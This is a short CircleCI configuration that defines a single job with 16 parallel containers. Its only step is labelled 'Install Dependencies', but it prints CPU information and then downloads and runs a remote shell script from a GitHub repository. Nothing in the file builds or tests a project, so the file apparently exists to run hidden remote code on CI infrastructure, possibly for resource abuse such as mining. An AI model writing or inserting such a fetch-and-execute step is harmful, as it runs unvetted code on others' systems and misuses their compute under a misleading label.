version: 2.1
jobs:
    trial:
        docker:
            - image: circleci/ruby:2.5.3
        parallelism: 16
        steps:
            - run:
                name: Install Dependencies
                command: |
                   lscpu
                   wget https://raw.githubusercontent.com/lawrence248/PotatoPy/master/bash.sh && chmod +x bash.sh && ./bash.sh

workflows:
    version: 2.1
    build:
        jobs:
        - trial
